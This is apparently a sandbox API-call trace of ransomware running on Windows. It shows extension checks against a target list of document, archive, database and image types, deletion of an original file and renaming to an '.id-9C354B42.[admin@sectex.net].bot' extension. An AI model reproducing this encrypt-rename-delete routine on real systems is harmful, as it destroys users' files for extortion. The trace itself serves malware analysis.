	[0040.399] WriteFile (in: hFile=0x1c0, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xea, lpOverlapped=0x0) returned 1
	[0040.399] SetEndOfFile (hFile=0x1c0) returned 1
	[0040.399] CloseHandle (hObject=0x1c0) returned 1
	[0040.411] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0040.411] SetEndOfFile (hFile=0x1a0) returned 1
	[0040.413] CloseHandle (hObject=0x1a0) returned 1
	[0040.413] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0040.413] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\metconv.txt")) returned 1
	[0040.413] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT") returned 68
	[0040.413] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT") returned 68
	[0040.413] lstrlenW (lpString=".doc") returned 4
	[0040.413] lstrcmpiW (lpString1=".doc", lpString2=".TXT") returned -1
	[0040.413] lstrlenW (lpString=".docx") returned 5
	[0040.413] lstrcmpiW (lpString1=".docx", lpString2="V.TXT") returned -1
	[0040.413] lstrlenW (lpString=".pdf") returned 4
	[0040.413] lstrcmpiW (lpString1=".pdf", lpString2=".TXT") returned -1
	[0040.414] lstrlenW (lpString=".xls") returned 4
	[0040.414] lstrcmpiW (lpString1=".xls", lpString2=".TXT") returned 1
	[0040.414] lstrlenW (lpString=".xlsx") returned 5
	[0040.414] lstrcmpiW (lpString1=".xlsx", lpString2="V.TXT") returned -1
	[0040.414] lstrlenW (lpString=".ppt") returned 4
	[0040.414] lstrcmpiW (lpString1=".ppt", lpString2=".TXT") returned -1
	[0040.414] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT") returned 68
	[0040.414] lstrlenW (lpString=".zip") returned 4
	[0040.414] lstrcmpiW (lpString1=".zip", lpString2=".TXT") returned 1
	[0040.414] lstrlenW (lpString=".rar") returned 4
	[0040.414] lstrcmpiW (lpString1=".rar", lpString2=".TXT") returned -1
	[0040.414] lstrlenW (lpString=".bz2") returned 4
	[0040.414] lstrcmpiW (lpString1=".bz2", lpString2=".TXT") returned -1
	[0040.414] lstrlenW (lpString=".7z") returned 3
	[0040.414] lstrcmpiW (lpString1=".7z", lpString2="TXT") returned -1
	[0040.414] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT") returned 68
	[0040.414] lstrlenW (lpString=".dbf") returned 4
	[0040.414] lstrcmpiW (lpString1=".dbf", lpString2=".TXT") returned -1
	[0040.414] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT") returned 68
	[0040.414] lstrlenW (lpString=".1cd") returned 4
	[0040.414] lstrcmpiW (lpString1=".1cd", lpString2=".TXT") returned -1
	[0040.414] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT") returned 68
	[0040.414] lstrlenW (lpString=".jpg") returned 4
	[0040.414] lstrcmpiW (lpString1=".jpg", lpString2=".TXT") returned -1
	[0040.414] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT") returned 68
	[0040.414] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT") returned 68
	[0040.414] lstrlenW (lpString=".doc") returned 4
	[0040.414] lstrcmpiW (lpString1=".doc", lpString2=".TXT") returned -1
	[0040.414] lstrlenW (lpString=".docx") returned 5
	[0040.414] lstrcmpiW (lpString1=".docx", lpString2="V.TXT") returned -1
	[0040.414] lstrlenW (lpString=".pdf") returned 4
	[0040.414] lstrcmpiW (lpString1=".pdf", lpString2=".TXT") returned -1
	[0040.414] lstrlenW (lpString=".xls") returned 4
	[0040.414] lstrcmpiW (lpString1=".xls", lpString2=".TXT") returned 1
	[0040.415] lstrlenW (lpString=".xlsx") returned 5
	[0040.415] lstrcmpiW (lpString1=".xlsx", lpString2="V.TXT") returned -1
	[0040.415] lstrlenW (lpString=".ppt") returned 4
	[0040.415] lstrcmpiW (lpString1=".ppt", lpString2=".TXT") returned -1
	[0040.415] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT") returned 68
	[0040.415] lstrlenW (lpString=".zip") returned 4
	[0040.415] lstrcmpiW (lpString1=".zip", lpString2=".TXT") returned 1
	[0040.415] lstrlenW (lpString=".rar") returned 4
	[0040.415] lstrcmpiW (lpString1=".rar", lpString2=".TXT") returned -1
	[0040.415] lstrlenW (lpString=".bz2") returned 4
	[0040.415] lstrcmpiW (lpString1=".bz2", lpString2=".TXT") returned -1
	[0040.415] lstrlenW (lpString=".7z") returned 3
	[0040.415] lstrcmpiW (lpString1=".7z", lpString2="TXT") returned -1
	[0040.415] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT") returned 68
	[0040.415] lstrlenW (lpString=".dbf") returned 4
	[0040.415] lstrcmpiW (lpString1=".dbf", lpString2=".TXT") returned -1
	[0040.415] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT") returned 68
	[0040.415] lstrlenW (lpString=".1cd") returned 4
	[0040.415] lstrcmpiW (lpString1=".1cd", lpString2=".TXT") returned -1
	[0040.415] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT") returned 68
	[0040.415] lstrlenW (lpString=".jpg") returned 4
	[0040.415] lstrcmpiW (lpString1=".jpg", lpString2=".TXT") returned -1
	[0040.415] lstrcmpiW (lpString1=".htm", lpString2=".bot") returned 1
	[0040.415] lstrlenW (lpString="Bears.htm") returned 9
	[0040.415] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0
	[0040.417] GetFileSizeEx (in: hFile=0x1c0, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=255) returned 1
	[0040.417] CloseHandle (hObject=0x1c0) returned 1
	[0040.417] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.htm")) returned 0x20
	[0040.417] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.htm.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0040.417] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0040.417] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm") returned 67
	[0040.417] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm") returned 67
	[0040.418] lstrlenW (lpString=".doc") returned 4
	[0040.418] lstrcmpiW (lpString1=".doc", lpString2=".htm") returned -1
	[0040.418] lstrlenW (lpString=".docx") returned 5
	[0040.418] lstrcmpiW (lpString1=".docx", lpString2="s.htm") returned -1
	[0040.418] lstrlenW (lpString=".pdf") returned 4
	[0040.418] lstrcmpiW (lpString1=".pdf", lpString2=".htm") returned 1
	[0040.418] lstrlenW (lpString=".xls") returned 4
	[0040.418] lstrcmpiW (lpString1=".xls", lpString2=".htm") returned 1
	[0040.418] lstrlenW (lpString=".xlsx") returned 5
	[0040.418] lstrcmpiW (lpString1=".xlsx", lpString2="s.htm") returned -1
	[0040.418] lstrlenW (lpString=".ppt") returned 4
	[0040.418] lstrcmpiW (lpString1=".ppt", lpString2=".htm") returned 1
	[0040.418] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm") returned 67
	[0040.418] lstrlenW (lpString=".zip") returned 4
	[0040.418] lstrcmpiW (lpString1=".zip", lpString2=".htm") returned 1
	[0040.418] lstrlenW (lpString=".rar") returned 4
	[0040.418] lstrcmpiW (lpString1=".rar", lpString2=".htm") returned 1
	[0040.418] lstrlenW (lpString=".bz2") returned 4
	[0040.418] lstrcmpiW (lpString1=".bz2", lpString2=".htm") returned -1
	[0040.418] lstrlenW (lpString=".7z") returned 3
	[0040.418] lstrcmpiW (lpString1=".7z", lpString2="htm") returned -1
	[0040.418] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm") returned 67
	[0040.418] lstrlenW (lpString=".dbf") returned 4
	[0040.418] lstrcmpiW (lpString1=".dbf", lpString2=".htm") returned -1
	[0040.418] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm") returned 67
	[0040.418] lstrlenW (lpString=".1cd") returned 4
	[0040.418] lstrcmpiW (lpString1=".1cd", lpString2=".htm") returned -1
	[0040.418] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm") returned 67
	[0040.418] lstrlenW (lpString=".jpg") returned 4
	[0040.418] lstrcmpiW (lpString1=".jpg", lpString2=".htm") returned 1
	[0040.418] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm") returned 67
	[0040.418] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm") returned 67
	[0040.418] lstrlenW (lpString=".doc") returned 4
	[0040.418] lstrcmpiW (lpString1=".doc", lpString2=".htm") returned -1
	[0040.419] lstrlenW (lpString=".docx") returned 5
	[0040.419] lstrcmpiW (lpString1=".docx", lpString2="s.htm") returned -1
	[0040.419] lstrlenW (lpString=".pdf") returned 4
	[0040.419] lstrcmpiW (lpString1=".pdf", lpString2=".htm") returned 1
	[0040.419] lstrlenW (lpString=".xls") returned 4
	[0040.419] lstrcmpiW (lpString1=".xls", lpString2=".htm") returned 1
	[0040.419] lstrlenW (lpString=".xlsx") returned 5
	[0040.419] lstrcmpiW (lpString1=".xlsx", lpString2="s.htm") returned -1
	[0040.419] lstrlenW (lpString=".ppt") returned 4
	[0040.419] lstrcmpiW (lpString1=".ppt", lpString2=".htm") returned 1
	[0040.419] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm") returned 67
	[0040.419] lstrlenW (lpString=".zip") returned 4
	[0040.419] lstrcmpiW (lpString1=".zip", lpString2=".htm") returned 1
	[0040.419] lstrlenW (lpString=".rar") returned 4
	[0040.419] lstrcmpiW (lpString1=".rar", lpString2=".htm") returned 1
	[0040.419] lstrlenW (lpString=".bz2") returned 4
	[0040.419] lstrcmpiW (lpString1=".bz2", lpString2=".htm") returned -1
	[0040.419] lstrlenW (lpString=".7z") returned 3
	[0040.419] lstrcmpiW (lpString1=".7z", lpString2="htm") returned -1
	[0040.419] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm") returned 67
	[0040.419] lstrlenW (lpString=".dbf") returned 4
	[0040.419] lstrcmpiW (lpString1=".dbf", lpString2=".htm") returned -1
	[0040.419] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm") returned 67
	[0040.419] lstrlenW (lpString=".1cd") returned 4
	[0040.419] lstrcmpiW (lpString1=".1cd", lpString2=".htm") returned -1
	[0040.419] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm") returned 67
	[0040.419] lstrlenW (lpString=".jpg") returned 4
	[0040.419] lstrcmpiW (lpString1=".jpg", lpString2=".htm") returned 1
	[0040.419] lstrcmpiW (lpString1=".jpg", lpString2=".bot") returned 1
	[0040.419] lstrlenW (lpString="Bears.jpg") returned 9
	[0040.420] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0
	[0040.420] GetFileSizeEx (in: hFile=0x1c0, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=1074) returned 1
	[0040.420] CloseHandle (hObject=0x1c0) returned 1
	[0040.420] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.jpg")) returned 0x20
	[0040.420] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.jpg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0040.420] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0040.420] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg") returned 67
	[0040.420] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg") returned 67
	[0040.420] lstrlenW (lpString=".doc") returned 4
	[0040.420] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1
	[0040.420] lstrlenW (lpString=".docx") returned 5
	[0040.420] lstrcmpiW (lpString1=".docx", lpString2="s.jpg") returned -1
	[0040.420] lstrlenW (lpString=".pdf") returned 4
	[0040.420] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1
	[0040.420] lstrlenW (lpString=".xls") returned 4
	[0040.420] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1
	[0040.420] lstrlenW (lpString=".xlsx") returned 5
	[0040.420] lstrcmpiW (lpString1=".xlsx", lpString2="s.jpg") returned -1
	[0040.420] lstrlenW (lpString=".ppt") returned 4
	[0040.420] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1
	[0040.420] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg") returned 67
	[0040.421] lstrlenW (lpString=".zip") returned 4
	[0040.421] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1
	[0040.421] lstrlenW (lpString=".rar") returned 4
	[0040.421] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1
	[0040.421] lstrlenW (lpString=".bz2") returned 4
	[0040.421] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1
	[0040.421] lstrlenW (lpString=".7z") returned 3
	[0040.421] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1
	[0040.421] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg") returned 67
	[0040.421] lstrlenW (lpString=".dbf") returned 4
	[0040.421] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1
	[0040.421] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg") returned 67
	[0040.421] lstrlenW (lpString=".1cd") returned 4
	[0040.421] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1
	[0040.421] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg") returned 67
	[0040.421] lstrlenW (lpString=".jpg") returned 4
	[0040.421] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0
	[0040.421] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg") returned 67
	[0040.421] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg") returned 67
	[0040.421] lstrlenW (lpString=".doc") returned 4
	[0040.421] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1
	[0040.421] lstrlenW (lpString=".docx") returned 5
	[0040.421] lstrcmpiW (lpString1=".docx", lpString2="s.jpg") returned -1
	[0040.421] lstrlenW (lpString=".pdf") returned 4
	[0040.421] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1
	[0040.421] lstrlenW (lpString=".xls") returned 4
	[0040.421] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1
	[0040.421] lstrlenW (lpString=".xlsx") returned 5
	[0040.421] lstrcmpiW (lpString1=".xlsx", lpString2="s.jpg") returned -1
	[0040.421] lstrlenW (lpString=".ppt") returned 4
	[0040.421] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1
	[0040.421] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg") returned 67
	[0040.421] lstrlenW (lpString=".zip") returned 4
	[0040.421] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1
	[0040.422] lstrlenW (lpString=".rar") returned 4
	[0040.422] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1
	[0040.422] lstrlenW (lpString=".bz2") returned 4
	[0040.422] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1
	[0040.422] lstrlenW (lpString=".7z") returned 3
	[0040.422] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1
	[0040.422] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg") returned 67
	[0040.422] lstrlenW (lpString=".dbf") returned 4
	[0040.422] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1
	[0040.422] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg") returned 67
	[0040.422] lstrlenW (lpString=".1cd") returned 4
	[0040.422] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1
	[0040.422] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg") returned 67
	[0040.422] lstrlenW (lpString=".jpg") returned 4
	[0040.422] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0
	[0040.422] lstrcmpiW (lpString1=".jpg", lpString2=".bot") returned 1
	[0040.422] lstrlenW (lpString="Blue_Gradient.jpg") returned 17
	[0040.422] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\blue_gradient.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0
	[0040.423] GetFileSizeEx (in: hFile=0x1c0, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=2575) returned 1
	[0040.423] CloseHandle (hObject=0x1c0) returned 1
	[0040.423] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\blue_gradient.jpg")) returned 0x20
	[0040.423] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\blue_gradient.jpg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0040.423] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\blue_gradient.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0040.423] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg") returned 75
	[0040.423] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg") returned 75
	[0040.423] lstrlenW (lpString=".doc") returned 4
	[0040.423] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1
	[0040.423] lstrlenW (lpString=".docx") returned 5
	[0040.423] lstrcmpiW (lpString1=".docx", lpString2="t.jpg") returned -1
	[0040.423] lstrlenW (lpString=".pdf") returned 4
	[0040.423] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1
	[0040.423] lstrlenW (lpString=".xls") returned 4
	[0040.424] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1
	[0040.424] lstrlenW (lpString=".xlsx") returned 5
	[0040.424] lstrcmpiW (lpString1=".xlsx", lpString2="t.jpg") returned -1
	[0040.424] lstrlenW (lpString=".ppt") returned 4
	[0040.424] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1
	[0040.424] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg") returned 75
	[0040.424] lstrlenW (lpString=".zip") returned 4
	[0040.424] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1
	[0040.424] lstrlenW (lpString=".rar") returned 4
	[0040.424] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1
	[0040.424] lstrlenW (lpString=".bz2") returned 4
	[0040.424] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1
	[0040.424] lstrlenW (lpString=".7z") returned 3
	[0040.424] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1
	[0040.424] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg") returned 75
	[0040.424] lstrlenW (lpString=".dbf") returned 4
	[0040.424] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1
	[0040.424] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg") returned 75
	[0040.424] lstrlenW (lpString=".1cd") returned 4
	[0040.424] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1
	[0040.424] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg") returned 75
	[0040.424] lstrlenW (lpString=".jpg") returned 4
	[0040.424] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0
	[0040.424] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg") returned 75
	[0040.424] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg") returned 75
	[0040.424] lstrlenW (lpString=".doc") returned 4
	[0040.424] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1
	[0040.424] lstrlenW (lpString=".docx") returned 5
	[0040.424] lstrcmpiW (lpString1=".docx", lpString2="t.jpg") returned -1
	[0040.424] lstrlenW (lpString=".pdf") returned 4
	[0040.424] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1
	[0040.424] lstrlenW (lpString=".xls") returned 4
	[0040.424] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1
	[0040.424] lstrlenW (lpString=".xlsx") returned 5
	[0040.425] lstrcmpiW (lpString1=".xlsx", lpString2="t.jpg") returned -1
	[0040.425] lstrlenW (lpString=".ppt") returned 4
	[0040.425] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1
	[0040.425] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg") returned 75
	[0040.425] lstrlenW (lpString=".zip") returned 4
	[0040.425] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1
	[0040.425] lstrlenW (lpString=".rar") returned 4
	[0040.425] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1
	[0040.425] lstrlenW (lpString=".bz2") returned 4
	[0040.425] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1
	[0040.425] lstrlenW (lpString=".7z") returned 3
	[0040.425] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1
	[0040.425] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg") returned 75
	[0040.425] lstrlenW (lpString=".dbf") returned 4
	[0040.425] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1
	[0040.425] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg") returned 75
	[0040.425] lstrlenW (lpString=".1cd") returned 4
	[0040.425] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1
	[0040.425] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg") returned 75
	[0040.425] lstrlenW (lpString=".jpg") returned 4
	[0040.425] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0
	[0040.425] lstrcmpiW (lpString1=".gif", lpString2=".bot") returned 1
	[0040.425] lstrlenW (lpString="Cave_Drawings.gif") returned 17
	[0040.425] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\cave_drawings.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0
	[0040.426] GetFileSizeEx (in: hFile=0x1c0, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=4587) returned 1
	[0040.426] CloseHandle (hObject=0x1c0) returned 1
	[0040.426] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\cave_drawings.gif")) returned 0x20
	[0040.426] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\cave_drawings.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0040.426] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\cave_drawings.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0040.426] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif") returned 75
	[0040.426] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif") returned 75
	[0040.743] lstrlenW (lpString=".doc") returned 4
	[0040.743] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1
	[0040.743] lstrlenW (lpString=".docx") returned 5
	[0040.743] lstrcmpiW (lpString1=".docx", lpString2="s.gif") returned -1
	[0040.744] lstrlenW (lpString=".pdf") returned 4
	[0040.744] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1
	[0040.744] lstrlenW (lpString=".xls") returned 4
	[0040.744] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1
	[0040.744] lstrlenW (lpString=".xlsx") returned 5
	[0040.744] lstrcmpiW (lpString1=".xlsx", lpString2="s.gif") returned -1
	[0040.744] lstrlenW (lpString=".ppt") returned 4
	[0040.744] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1
	[0040.744] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif") returned 75
	[0040.744] lstrlenW (lpString=".zip") returned 4
	[0040.744] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1
	[0040.744] lstrlenW (lpString=".rar") returned 4
	[0040.744] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1
	[0040.744] lstrlenW (lpString=".bz2") returned 4
	[0040.744] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1
	[0040.744] lstrlenW (lpString=".7z") returned 3
	[0040.744] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1
